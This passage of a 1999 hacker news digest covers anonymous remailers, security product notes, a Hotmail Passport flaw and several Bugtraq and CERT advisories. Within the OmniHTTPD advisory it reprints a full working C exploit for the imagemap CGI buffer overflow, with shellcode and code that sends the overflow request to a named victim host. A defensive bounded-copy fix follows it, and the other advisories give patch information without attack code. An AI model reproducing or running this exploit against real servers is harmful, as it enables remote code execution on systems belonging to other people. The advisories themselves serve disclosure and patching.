Many top-rate remailers do NOT satisfy all these requirements. However, these remailers are far superior to your ordinary Internet Service Provider. So please don't make yourself crazy looking for the "perfect" solution. Life is not perfect. If a remailer does NOT permit PGP (Pretty Good Privacy) or other strong encryption, reasonable people might assume that the remailer administrator enjoys reading forwarded mail.

What makes a responsible remailer user?

A responsible user:
(a) Sends text files of a reasonable length. Binary photo files of Pam Anderson, or the Babe-of-the-Month, can take too much transmission time.
(b) Transmits files selectively. Remailers are NOT designed to send "You Can Get Rich" chain letters or other junk mail.

Who are irresponsible remailer users?

Here is a quote from one remailer administrator: "This remailer has been abused in the past, mostly by users hiding behind anonymity to harass other users. I will take steps to squish users who do this. Let's keep the net a friendly and productive place....
Using this remailer to send death threats is highly obnoxious. I will reveal your return address to the police if you do this."

Legitimate remailer administrators will NOT TOLERATE serious harassment or criminal activity. Report any such incidents to the remailer administrator. Having said that, I must report that I receive e-mail such as this: "Someone is using a FU..ING remailer to call me a hateful person. I want to get my FU..ING hands on that FU..ING (obscenities deleted) person and kill him for spreading the vicious lie that I have a bad temper. Why won't the FU..ING jerk who runs the remailer help innocent victims like me?" As I implied earlier, it is not easy to run a remailer!

How safe are remailers? [for paranoids only :-)]

For most low-security tasks, such as responding to personal ads, PSEUDO anonymous remailers with passcode protection are undoubtedly safer than using real e-mail addresses. However, all the best made plans of mice and men have weaknesses. Suppose, for example, that you are a government employee, who just discovered that your boss is taking bribes. Is it safe to use a PSEUDO anonymous remailer to send evidence to a government whistleblower's e-mail hot line? Here are a few points to ponder:

(a) The person who runs your e-mail system might intercept your secret messages to and from the remailer. This gives him proof that YOU are reporting your corrupt boss. This evidence could put you in danger.

(b) Maybe the remailer is a government sting operation or a criminal enterprise designed to entrap people. The person who runs this service might be your corrupt boss' partner. Warning: I have seen a few remailers that strike me as suspicious. For legal reasons, I cannot name these services. You must decide for yourself who to trust.

(c) Hackers can do magic with computers. It's possible that civilian or Big Brother hackers have broken into the remailer (unbeknownst to the remailer's administrator), and that they can read your messages at will.
(d) It is possible that Big Brother collects, scans, and stores all messages, including passcodes, into and out of the remailer.

(e) If you use a United States based remailer, a U.S. judge could subpoena the remailer's records.

For these reasons, hard-core privacy people are leery of PSEUDO anonymous remailers. These people use Cypherpunk or Mixmaster programs that route their messages through several ANONYMOUS remailers. In addition, they use PGP encryption software for all messages.

(For a good anonymous remailer try out www.replay.com ... - Ed)

@HWA

55.0 PROJECT GAMMA STILL DOWN
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ, Saturday 23rd October 1999 on 2:12 am CET

Project Gamma is still down, but WHiTe VaMPiRe tells all of its visitors: "The DNS will be down for another week. Probably the soonest pG will be back up now is on the 25th. ;\ We are doing everything that is humanly possible to bring it back, as quickly as possible"

@HWA

56.0 PRIVATE DESKTOP
~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ, Saturday 23rd October 1999 on 2:24 am CET

ConSeal® Private Desktop is a personal firewall that puts you in full control of your PC's connection to the Internet! Designed for the non-technical user, this privacy management tool stops all known attacks including Back Orifice, denial of service and cyber stalkers.

http://www.signal9.com/products/desktop/index.html

@HWA

57.0 Y2K RELATED DISASTER
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ, Saturday 23rd October 1999 on 1:04 am CET

Chicago Tribune wrote about an ecological disaster with roots in Y2K solving - Trying a dose of preventive medicine, Alexian Brothers Medical Center in Elk Grove Village prepared for a possible Y2K power outage by pumping up the diesel fuel tanks that power the hospital's electrical generators. But the hospital's good intentions backfired earlier this month when the tanks received more fuel than they could hold.
The overflow--2,000 gallons--seeped through an underground drain tile, through a series of storm sewers and, finally, into a retention pond surrounded by luxury homes.

@HWA

58.0 ANTI-MS SOFTWARE
~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ, Saturday 23rd October 1999 on 1:04 am CET

Revenge of Mozilla is the first utility to completely remove Internet Explorer from Windows 98. The first version of Revenge of Mozilla was a companion for 98Lite, finishing the job that 98Lite left behind. It was created due to a strong demand for an application that would 1) Remove IE in its entirety, 2) Do it *all* in one shot, 3) Not require fussing with a DOS-based application prior to installing Windows98, and 4) Be completely free of charge for the web community to enjoy.

http://www.silverlink.net/~jensenba/rom2/

@HWA

59.0 HOTMAIL: ANOTHER VULNERABILITY, THE SOAP CONTINUES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by Thejian, Friday 22nd October 1999 on 8:20 pm CET

Within the last couple of weeks, Microsoft has unveiled their new Passport service which allows you to log in to multiple sites and do your work with one single login. However, they failed to realize that not all people allow all cookies everywhere to be put on their computer. It is possible by making a settings change in Netscape (and possibly IE) to transparently let a user log in as the last user that used Hotmail on that computer. Microsoft is investigating the problem but noted that it's a problem within the Passport sign-out service and added that the Passport wallet service is not vulnerable.

@HWA

60.0 Books: Hacking Exposed: Network Security Secrets and Solutions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.securityfocus.com/

Hacking Exposed: Network Security Secrets and Solutions
by George Kurtz, Stuart McClure and Joel Scambray
Type: book
ISBN: 0072121270
Year: 1999
Defend your network against the sneakiest hacks and latest attacks. In this must-have handbook, security experts Stuart McClure, Joel Scambray, and George Kurtz give you the full scoop on some of the most highly publicized and insidious break-ins and show you how to implement bulletproof security on your system. All aspects of network security are included from informational scans and probes to password vulnerabilities, dialup networking insecurities, buffer overflows, Web and email insecurities, trojans, and back doors. Hacking Exposed: Network Security Secrets and Solutions covers all security, auditing, and intrusion detection procedures for UNIX (including Linux), Windows NT/95/98, and Novell networks. The bonus companion web site (www.hackingexposed.com) contains custom scanning scripts and links to security tools. Foreword by industry expert Marcus Ranum, CEO of Network Flight Recorder (NFR).

Here's what security experts are saying about "Hacking Exposed".

"Understanding how to mount and create attacks is the only way you can protect against existing and, more importantly, future attacks. The information contained herein arms those on the defensive (security admin, network architects, software developers, etc) with this knowledge. It is refreshing to see this sort of material finally being made available to the general public."
- Dr. Mudge of Lopht security research group, developers of the Lophtcrack NT password auditing tool

"My experience in securing systems is that most users are shocked when they find out how vulnerable they really are. Perhaps this book will shock you. No matter what, it will educate you."
- Marcus Ranum, CEO of Network Flight Recorder

"The authors have put together an excellent up-to-date resource on modern security vulnerabilities. Rather than simply documenting a few case studies and talking about problems on a macro scale, the authors build up a robust framework and dissect the security issues completely. Each vulnerability covered has detailed countermeasure information. More than a how-to manual, it's a how-to-do-it-right manual. A book like this has been needed for quite some time now."
- Mike D. Schiffman ("Route"), Security Researcher and Author of the Firewalk tool

"Hacking Exposed is a gut wrenching look at the security techniques used in computer penetration. The authors provide an up to date and comprehensive view of the methods that hackers use to compromise your networks. If this book doesn't scare and motivate you to take security seriously, nothing will."
- Aleph One, Moderator of the Bugtraq Security Mailing List

"This book is destined to be a classic. Unlike most other security books, this explains details on hacker tools - why they are used, how they work, and how best to protect yourself from them. The underground already knows this stuff, and this book helps the sys admin see their systems through the intruder's eyes."
- Simple Nomad, Renowned Security Researcher and Author of The Hack FAQ

Learn to:
- Find, exploit, and apply countermeasures for security holes in Unix, Linux, Windows NT/95/98, and Novell networks
- Repair email and Web security holes (CGI, Perl, ASP, browsers, and hostile mobile code)
- Understand how back channels and port redirection are used to circumvent firewalls
- Locate and scan for vulnerable systems using Whois, Domain Name System queries, Ping Sweeps, Port Scans, and OS detection
- Enumerate users, groups, shares, file systems, and services with no authentication
- Crack accounts and passwords, escalate privilege, and exploit trusts
- Find and eliminate back doors, Trojan horses, viruses, and buffer overflows
- Implement auditing and intrusion detection solutions
- Recognize vulnerabilities from dialup modems, modem pools, and RAS servers
@HWA

61.0 Microsoft Java Virtual Machine Class Cast Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.securityfocus.com/

bugtraq id   740
class        Failure to Handle Exceptional Conditions
cve          GENERIC-MAP-NOMATCH
remote       Yes
local        Yes
published    October 22, 1999
updated      October 22, 1999

vulnerable
  Microsoft Virtual Machine 3000.0 Series
    + Microsoft Internet Explorer 5.0 for Windows NT 4.0
      + Microsoft Windows NT 4.0
    + Microsoft Internet Explorer 5.0 for Windows 98
      + Microsoft Windows 98
    + Microsoft Internet Explorer 5.0 for Windows 95
      + Microsoft Windows 95
    + Microsoft Internet Explorer 5.0 for Windows 2000
      - Microsoft Windows NT 2000.0
  Microsoft Virtual Machine 2000.0 Series
    + Microsoft Internet Explorer 4.0 for Windows NT 4.0
      + Microsoft Windows NT 4.0
    + Microsoft Internet Explorer 4.0 for Windows NT 3.51
      - Microsoft Windows NT 3.5.1
    + Microsoft Internet Explorer 4.0 for Windows 98
      + Microsoft Windows 98
    + Microsoft Internet Explorer 4.0 for Windows 95
      + Microsoft Windows 95

not vulnerable
  Microsoft Virtual Machine 3188.0.0 and up
    - Microsoft Internet Explorer 5.0 for Windows NT 4.0
      + Microsoft Windows NT 4.0
    - Microsoft Internet Explorer 5.0 for Windows 98
      + Microsoft Windows 98
    - Microsoft Internet Explorer 5.0 for Windows 95
      + Microsoft Windows 95
    - Microsoft Internet Explorer 5.0 for Windows 2000
      - Microsoft Windows NT 2000.0
    - Microsoft Internet Explorer 4.0 for Windows NT 4.0
      + Microsoft Windows NT 4.0
    - Microsoft Internet Explorer 4.0 for Windows NT 3.51
      - Microsoft Windows NT 3.5.1
    - Microsoft Internet Explorer 4.0 for Windows 98
      + Microsoft Windows 98
    - Microsoft Internet Explorer 4.0 for Windows 95
      + Microsoft Windows 95

The Virtual Machine is a component of various programs and operating systems that handles the execution of Java code. All Microsoft VMs with build numbers between 2000 and 3187 inclusive have been found to contain a weakness whereby a Java applet could take any action on the local machine that the user could take.
This is possible because the MS VM allows 'cast', or conversion, operations to be done on classes, which creates the opportunity for a 'public' class to be converted to 'private', thereby increasing the privileges of the code within that class. This action could not be coded in a regular Java compiler, but the Java binary could be edited specifically to cause the cast operation.

Microsoft has released a new build that is not subject to this vulnerability, available at:
http://www.microsoft.com/java/vm/dl_vm32.htm

credit
Publicized in Microsoft Security Bulletin MS99-045, released on Oct 21, 1999.

reference
advisory: MS99-045: Patch Available "Virtual Machine Verifier" Vulnerability (MS)
web page: Microsoft Security Bulletin (MS99-045): Frequently Asked Questions (Microsoft)
web page: Microsoft Virtual Machine (Microsoft)

@HWA

62.0 OmniHTTPD Buffer Overflow Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id   739
class        Boundary Condition Error
cve          GENERIC-MAP-NOMATCH
remote       Yes
local        No
published    October 22, 1999
updated      October 22, 1999

vulnerable
  Omnicron OmniHTTPD 2.4Pro
  Omnicron OmniHTTPD 1.1

There is a remotely exploitable buffer overflow vulnerability in the CGI program "imagemap", which is distributed with Omnicron's OmniHTTPD. During operations made on arguments passed to the program, a lack of bounds checking on a strcpy() call can allow for arbitrary code to be executed on the machine running the server.
/*=============================================================================
  Imagemap 1.00.00 CGI Exploit (Distributed with OmniHTTPd 1.01 and Pro2.04)
  The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================*/

/* The four header names were stripped when this issue was extracted; the
   ones below are assumed from the Win32/Winsock calls the code makes. */
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#define MAXBUF    2000
#define RETADR    348
#define JMPADR    344
#define HTTP_PORT 80

/* Address ranges (start,end pairs) to search for a usable jump; 0,0 ends it. */
unsigned int mems[]={
    0xBFB50000, 0xBFB72FFF,
    0xBFDE0000, 0xBFDE5FFF,
    0xBFE00000, 0xBFE0FFFF,
    0xBFE30000, 0xBFE42FFF,
    0xBFE80000, 0xBFE85FFF,
    0xBFE90000, 0xBFE95FFF,
    0xBFEA0000, 0xBFF1EFFF,
    0xBFF20000, 0xBFF46FFF,
    0xBFF50000, 0xBFF60FFF,
    0xBFF70000, 0xBFFC5FFF,
    0xBFFC9000, 0xBFFE2FFF,
    0,0};

unsigned char exploit_code[200]={
    0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
    0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
    0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
    0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
    0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
    0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
    0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
    0xFF,0x00 };

unsigned char cmdbuf[200]="msvcrt.dll.system.welcome.exe";

/* Search [st,ed) for the byte pair c1 c2 and return its address, skipping
   any candidate whose address contains a NUL byte. */
unsigned int search_mem(unsigned char *st,unsigned char *ed,
                        unsigned char c1,unsigned char c2)
{
    unsigned char *p;
    unsigned int adr;

    /* The loop head and first two checks were lost in extraction (the "<"
       was read as a tag); reconstructed from the surrounding code (assumed). */
    for (p=st;p<ed;p++){
        if (*p!=c1 || *(p+1)!=c2) continue;
        adr=(unsigned int)p;
        if ((adr&0xff)==0) continue;
        if (((adr>>8)&0xff)==0) continue;
        if (((adr>>16)&0xff)==0) continue;
        if (((adr>>24)&0xff)==0) continue;
        return(adr);
    }
    return(0);
}

int main(int argc,char *argv[])
{
    SOCKET sock;
    SOCKADDR_IN addr;
    WSADATA wsa;
    WORD wVersionRequested;
    unsigned int i,ip,p1,p2;
    /* buf needs one extra byte for the terminator written at buf[MAXBUF] */
    static unsigned char buf[MAXBUF+1],packetbuf[MAXBUF+1000];
    struct hostent *hs;

    if (argc<2){
        printf("usage: %s VictimHost\n",argv[0]);
        return -1;
    }
    wVersionRequested = MAKEWORD( 2, 0 );
    if (WSAStartup(wVersionRequested , &wsa)!=0){
        printf("Winsock Initialization failed.\n");
        return -1;
    }
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){
        printf("Can not create socket.\n");
        return -1;
    }
    addr.sin_family = AF_INET;
    addr.sin_port   = htons((u_short)HTTP_PORT);
    if ((addr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
        if ((hs=gethostbyname(argv[1]))==NULL){
            printf("Can not resolve specified host.\n");
            return -1;
        }
        addr.sin_family = hs->h_addrtype;
        memcpy((void *)&addr.sin_addr.s_addr,hs->h_addr,hs->h_length);
    }
    if (connect(sock,(LPSOCKADDR)&addr,sizeof(addr))==SOCKET_ERROR){
        printf("Can not connect to specified host.\n");
        return -1;
    }
    memset(buf,0x90,MAXBUF);
    buf[MAXBUF]=0;
    for (i=0;;i+=2){
        if (mems[i]==0) return FALSE;
        if ((ip=search_mem((unsigned char *)mems[i],
                           (unsigned char *)mems[i+1],0xff,0xe3))!=0) break;
    }
    buf[RETADR  ]=ip&0xff;
    buf[RETADR+1]=(ip>>8)&0xff;
    buf[RETADR+2]=(ip>>16)&0xff;
    buf[RETADR+3]=(ip>>24)&0xff;
    buf[JMPADR  ]=0xeb;
    buf[JMPADR+1]=0x06;
    strcat((char *)exploit_code,(char *)cmdbuf);
    p1=(unsigned int)LoadLibrary;
    p2=(unsigned int)GetProcAddress;
    exploit_code[0x0d]=p1&0xff;
    exploit_code[0x0e]=(p1>>8)&0xff;
    exploit_code[0x0f]=(p1>>16)&0xff;
    exploit_code[0x10]=(p1>>24)&0xff;
    exploit_code[0x1e]=p2&0xff;
    exploit_code[0x1f]=(p2>>8)&0xff;
    exploit_code[0x20]=(p2>>16)&0xff;
    exploit_code[0x21]=(p2>>24)&0xff;
    memcpy(buf+RETADR+4,exploit_code,strlen((char *)exploit_code));
    sprintf((char *)packetbuf,"GET /cgi-bin/imagemap.exe?%s\r\n\r\n",buf);
    send(sock,(char *)packetbuf,strlen((char *)packetbuf),0);
    closesocket(sock);
    printf("Done.\n");
    return FALSE;
}

Since source code for the imagemap program is supplied, UNYUN of Shadow
Penguin Security suggests that checking for oversized arguments be added to
the code:

void main(int argc, char **argv)
{
    ----------- omit ----------
    char OutString[100];
    ----------- omit ----------
    if(argc >= 2)
    {
        //
        // extract x & y from passed values
        //
        strcpy(OutString, argv[1]);
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        Buffer overflow caused by this strcpy().

This overflow can be avoided if you put the following code before strcpy():

        if (strlen(argv[1]) > 99) exit(1);

There are no known vendor provided solutions to this problem.

credit

Posted to BugTraq by UNYUN on Oct 22, 1999.
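The length check above is the right idea; a bounded copy that refuses oversized input (rather than truncating it) and a strict x,y parser make the same fix reusable. This is an added example written for this issue, not imagemap's source or UNYUN's code; the buffer size of 100 is taken from OutString[100] above, while the "x,y" query format, the function names and the 'A'-filled probe strings are constructed assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define OUTSTRING_SIZE 100   /* same size as imagemap's OutString[100] */

/* Bounded replacement for the unchecked strcpy(OutString, argv[1]):
   copy `arg` into `out` only if it fits including the NUL terminator.
   Returns the length copied, or -1 if the argument is missing or too long.
   Unlike strncpy(), it refuses rather than silently truncating, so a
   malformed query is rejected instead of being partially processed. */
int copy_query_arg(const char *arg, char *out, size_t outsize)
{
    size_t n = 0;

    if (arg == NULL || out == NULL || outsize == 0)
        return -1;
    /* Look for the terminator only within what the buffer can hold. */
    while (n < outsize && arg[n] != '\0')
        n++;
    if (n == outsize)          /* no NUL within outsize bytes: too long */
        return -1;
    memcpy(out, arg, n + 1);
    return (int)n;
}

/* The "extract x & y" step imagemap performs on the copied string, done
   with strtol() so trailing junk is reported instead of ignored.
   Assumed query format: "x,y" (two decimal integers). */
int parse_coords(const char *s, long *x, long *y)
{
    char *end;

    *x = strtol(s, &end, 10);
    if (end == s || *end != ',')
        return -1;
    s = end + 1;
    *y = strtol(s, &end, 10);
    if (end == s || *end != '\0')
        return -1;
    return 0;
}

/* Constructed probe: an argument of `len` 'A' bytes run through the bounded
   copy into a 100-byte buffer; returns what copy_query_arg() returns. */
int try_arg_of_length(size_t len)
{
    char out[OUTSTRING_SIZE];
    char *arg = malloc(len + 1);
    int r;

    if (arg == NULL)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    r = copy_query_arg(arg, out, sizeof out);
    free(arg);
    return r;
}

/* CGI-style entry point: reject bad input before touching the buffer. */
int main(int argc, char **argv)
{
    char OutString[OUTSTRING_SIZE];
    long x, y;

    if (argc < 2 || copy_query_arg(argv[1], OutString, sizeof OutString) < 0) {
        printf("Content-type: text/plain\r\n\r\nBad or missing query\n");
        return 1;
    }
    if (parse_coords(OutString, &x, &y) != 0) {
        printf("Content-type: text/plain\r\n\r\nExpected x,y\n");
        return 1;
    }
    printf("Content-type: text/plain\r\n\r\nx=%ld y=%ld\n", x, y);
    return 0;
}
```

A 99-byte argument is the longest that fits with its terminator; 100 bytes and anything longer is refused before any copy happens, which is the boundary the original strcpy() crossed.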
reference

web page: Omnicron Homepage (Omnicron Technologies Corporation)
http://www.omnicron.ab.ca
message: Imagemap CGI overflow exploit (UNYUN)
http://www.securityfocus.com/templates/archive.pike?list=1&msg=380FFD9429E.0DA9SHADOWPENGUIN@fox.nightland.net

@HWA

63.0 Linux cdwtools Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id   738
class        Unknown
cve          GENERIC-MAP-NOMATCH
remote       No
local        Yes
published    October 22, 1999
updated      October 22, 1999
vulnerable   S.u.S.E. Linux 6.2
             S.u.S.E. Linux 6.1

cdwtools is a package of utilities for CD writing. The Linux version of
these utilities, which ships with S.u.S.E. Linux 6.1 and 6.2, is vulnerable
to several local root compromises. A number of ways to exploit these packages
are known, including buffer overflows and /tmp symlink attacks.

S.u.S.E. offers patched packages at the locations below:

ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/cdwtools-0.93-101.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/cdwtools-0.93-100.i386.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/ap1/cdwtools-0.93-101.alpha.rpm

credit

This bug was apparently discovered by Brock Tellier and published in a
S.u.S.E. advisory on Oct 20, 1999.

reference

advisory: SuSE-025: All Linux distributions using cdwtools (SuSE)
http://www.securityfocus.com/templates/advisory.html?id=1803
web page: S.u.S.E. Patches/Fixes (S.u.S.E.)
http://www.suse.de/de/support/download/updates/index.html

@HWA

64.0 WU-Ftpd NEW DoS Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bugtraq id     737
class          Failure to Handle Exceptional Conditions
cve            GENERIC-MAP-NOMATCH
remote         Yes
local          No
published      October 21, 1999
updated        October 21, 1999
vulnerable     Washington University wu-ftpd 2.5
               + RedHat Linux 6.1
not vulnerable Washington University wu-ftpd 2.6.0

It may be possible for remote users to cause wu-ftpd to consume large amounts
of memory, creating a denial of service.
If users can upload files, arbitrary code can be executed with the uid of the
ftpd (usually root).

You can upgrade to the newest version of Wu-ftpd (2.6) for any vulnerable
platform. RedHat has released patches available at the following locations:

Red Hat Linux 4.2
-----------------
Intel: ftp://updates.redhat.com//4.2/i386/wu-ftpd-2.6.0-0.4.2.i386.rpm
Alpha: ftp://updates.redhat.com//4.2/alpha/wu-ftpd-2.6.0-0.4.2.alpha.rpm
Sparc: ftp://updates.redhat.com//4.2/sparc/wu-ftpd-2.6.0-0.4.2.sparc.rpm
Source packages:
       ftp://updates.redhat.com//4.2/SRPMS/wu-ftpd-2.6.0-0.4.2.src.rpm

Red Hat Linux 5.2
-----------------
Intel: ftp://updates.redhat.com//5.2/i386/wu-ftpd-2.6.0-0.5.x.i386.rpm
Alpha: ftp://updates.redhat.com//5.2/alpha/wu-ftpd-2.6.0-0.5.x.alpha.rpm
Sparc: ftp://updates.redhat.com//5.2/sparc/wu-ftpd-2.6.0-0.5.x.sparc.rpm
Source packages:
       ftp://updates.redhat.com//5.2/SRPMS/wu-ftpd-2.6.0-0.5.x.src.rpm

Red Hat Linux 6.x
-----------------
Intel: ftp://updates.redhat.com//6.0/i386/wu-ftpd-2.6.0-1.i386.rpm
Alpha: ftp://updates.redhat.com//6.0/alpha/wu-ftpd-2.6.0-1.alpha.rpm
Sparc: ftp://updates.redhat.com//6.0/sparc/wu-ftpd-2.6.0-1.sparc.rpm
Source packages:
       ftp://updates.redhat.com//6.0/SRPMS/wu-ftpd-2.6.0-1.src.rpm

credit

Released in CERT advisory CA-99-13, posted to BugTraq on Oct 19, 1999, and
originally AUSCERT advisory AA-99.02, published on Oct 19, 1999.
reference

advisory: CA-99-13: Multiple Vulnerabilities in WU-FTPD (CERT)
http://www.securityfocus.com/templates/advisory.html?id=1797
advisory: AA-99.02: Multiple Vulnerabilities in wu-ftpd based daemons (AusCERT)
http://www.securityfocus.com/templates/advisory.html?id=1799
advisory: RHSA-1999:043-01: Security problems in WU-FTPD (RedHat)
http://www.securityfocus.com/templates/advisory.html?id=1801
web page: Updates, Fixes, and Errata Page (RedHat)
http://www.redhat.com/corp/support/errata/index.html

CA-99-13: Multiple Vulnerabilities in WU-FTPD
Published: Tue Oct 19 1999
Updated:   Tue Oct 19 1999

CERT Advisory CA-99-13 Multiple Vulnerabilities in WU-FTPD

Original release date: October 19, 1999
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

* Systems running the WU-FTPD daemon or its derivatives

I. Description

Three vulnerabilities have been identified in WU-FTPD and other ftp daemons
based on the WU-FTPD source code. WU-FTPD is a common package used to provide
File Transfer Protocol (FTP) services. Incidents involving at least the first
of these vulnerabilities have been reported to the CERT Coordination Center.

Vulnerability #1: MAPPING_CHDIR Buffer Overflow

Because of improper bounds checking, it is possible for an intruder to
overwrite static memory in certain configurations of the WU-FTPD daemon. The
overflow occurs in the MAPPING_CHDIR portion of the source code and is caused
by creating directories with carefully chosen names. As a result, FTP daemons
compiled without the MAPPING_CHDIR option are not vulnerable.

This is the same vulnerability described in AUSCERT Advisory AA-1999.01,
which is available from

ftp://www.auscert.org.au/security/advisory/AA-1999.01.wu-ftpd.mapping_chdir.vul

This is not the same vulnerability as the one described in CA-99-03 "FTP
Buffer Overflows", even though it is closely related.
Systems that have patches to correct the issue described in CA-99-03 may
still be vulnerable to this problem.

Vulnerability #2: Message File Buffer Overflow

Because of improper bounds checking during the expansion of macro variables
in the message file, intruders may be able to overwrite the stack of the FTP
daemon.

This is one of the vulnerabilities described in AUSCERT Advisory AA-1999.02,
which is available from

ftp://www.auscert.org.au/security/advisory/AA-1999.02.multi.wu-ftpd.vuls

Vulnerability #3: SITE NEWER Consumes Memory

The SITE NEWER command is a feature specific to WUFTPD designed to allow
mirroring software to identify all files newer than a supplied date. This
command fails to free memory under some circumstances.

II. Impact

Vulnerability #1: MAPPING_CHDIR Buffer Overflow

Remote and local intruders may be able to exploit this vulnerability to
execute arbitrary code as the user running the ftpd daemon, usually root.

To exploit this vulnerability, the intruder must be able to create
directories on the vulnerable systems that are accessible via FTP. While
remote intruders are likely to have this privilege only through anonymous FTP
access, local users may be able to create the required directories in their
own home directories.

Vulnerability #2: Message File Buffer Overflow

Remote and local intruders may be able to exploit this vulnerability to
execute arbitrary code as the user running the ftpd daemon, usually root.

If intruders are able to control the contents of a message file, they can
successfully exploit this vulnerability. This access is frequently available
to local users in their home directories, but it may be restricted in
anonymous FTP access, depending on your configuration. Additionally, under
some circumstances, remote intruders may be able to take advantage of message
files containing macros provided by the FTP administrator.
Vulnerability #3: SITE NEWER Consumes Memory

Remote and local intruders who can connect to the FTP server can cause the
server to consume excessive amounts of memory, preventing normal system
operation. If intruders can create files on the system, they may be able to
exploit this vulnerability to execute arbitrary code as the user running the
ftpd daemon, usually root.

III. Solution

Install appropriate patches from your vendor

These vulnerabilities can be eliminated by applying appropriate patches from
your vendor. We encourage you to apply a patch as soon as possible and to
disable vulnerable programs until you can do so. Disabling the WU-FTPD daemon
may prevent your system from operating normally.

Upgrading to WU-FTPD 2.6.0 may cause some inter-operability problems with
certain FTP clients. We encourage you to review the WU-FTPD documentation
carefully before performing this upgrade.

Appendix A contains information provided by vendors for this advisory. We
will update the appendix as we receive more information. If you do not see
your vendor's name, the CERT/CC did not hear from that vendor. Please contact
your vendor directly.

Until you can install a patch, you can apply the following workarounds.

Vulnerability #1: MAPPING_CHDIR Buffer Overflow

This vulnerability can be corrected by compiling the WU-FTPD daemon without
the MAPPING_CHDIR option. Exploitation by anonymous remote intruders can be
mitigated by limiting write access, but this solution is not encouraged.

Vulnerability #2: Message File Buffer Overflow

Remote exploitation of this vulnerability can be mitigated and possibly
eliminated by removing macros from message files until a patch can be
applied.

Vulnerability #3: SITE NEWER Consumes Memory

There are currently no workarounds available.

Appendix A. Vendor Information

Data General

DG/UX is not vulnerable to this problem.

FreeBSD

FreeBSD has updated its wuftpd and proftpd ports to correct this problem as
of August 30, 1999.
Users of these ports are encouraged to upgrade their installation to these
newer versions of these ports as soon as possible.

IBM Corporation

AIX is not vulnerable. It does not ship wu-ftpd.

IBM and AIX are registered trademarks of International Business Machines
Corporation.

OpenBSD

OpenBSD does not use (and never will use) wuftpd or any of its derivatives.

Santa Cruz Operation, Inc.

Security patches for SCO UnixWare 7.x, SCO UnixWare 2.x, and OpenServer 5.x
will be made available at http://www.sco.com/security.

SGI

SGI IRIX and Unicos do not ship with wu-ftpd, so they are not vulnerable.

As a courtesy, unsupported pre-compiled IRIX inst images for wu-ftpd are
available from http://freeware.sgi.com/ which may be vulnerable. When the
freeware products are next updated, they should contain the latest wu-ftpd
code which should include the security fixes.

SGI Linux 1.0 which is based on RedHat 6.0 ships with wu-ftpd rpms. When new
wu-ftpd rpms are available for RedHat 6.0, they can be installed on SGI Linux
1.0.

SGI NT Workstations do not ship with wu-ftpd.

Sun

Sun is not vulnerable.

WU-FTPD and BeroFTPD

Vulnerability #1:

Not vulnerable: versions 2.4.2 and all betas and earlier versions

Vulnerable:
  wu-ftpd-2.4.2-beta-18-vr4 through wu-ftpd-2.4.2-beta-18-vr15
  wu-ftpd-2.4.2-vr16 and wu-ftpd-2.4.2-vr17
  wu-ftpd-2.5.0
  BeroFTPD, all versions

Vulnerability #2:

Not vulnerable: wu-ftpd-2.6.0

Vulnerable:
  All versions of wuarchive-ftpd and wu-ftpd prior to version 2.6.0, from
  wustl.edu, academ.com, vr.net and wu-ftpd.org.
  BeroFTPD, all versions

Vulnerability #3:

Not vulnerable: wu-ftpd-2.6.0

Vulnerable:
  All versions of wuarchive-ftpd and wu-ftpd prior to version 2.6.0, from
  wustl.edu, academ.com, vr.net and wu-ftpd.org.
  BeroFTPD, all versions

With version 2.6.0, the major functionality of BeroFTPD has been merged back
into the WU-FTPD daemon. Development of BeroFTPD has ceased; there will be no
upgrades or patches. Users are advised to upgrade to WU-FTPD version 2.6.0.
WU-FTPD Version 2.6.0 is available for download from mirrors around the
world. A full list of mirrors is available from:

ftp://ftp.wu-ftpd.org/pub/README-MIRRORS

The current version of WU-FTPD (presently 2.6.0) is also available from the
primary distribution site:

ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-current.tar.gz
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-current.tar.Z

_________________________________________________________________

The CERT Coordination Center would like to thank Gregory Lundberg (a member
of the WU-FTPD development group) and AUSCERT for their assistance in
preparing this advisory.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-99-13-wuftpd.html

@HWA

65.0 Axent Raptor Denial of Service Vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.securityfocus.com/

bugtraq id   736
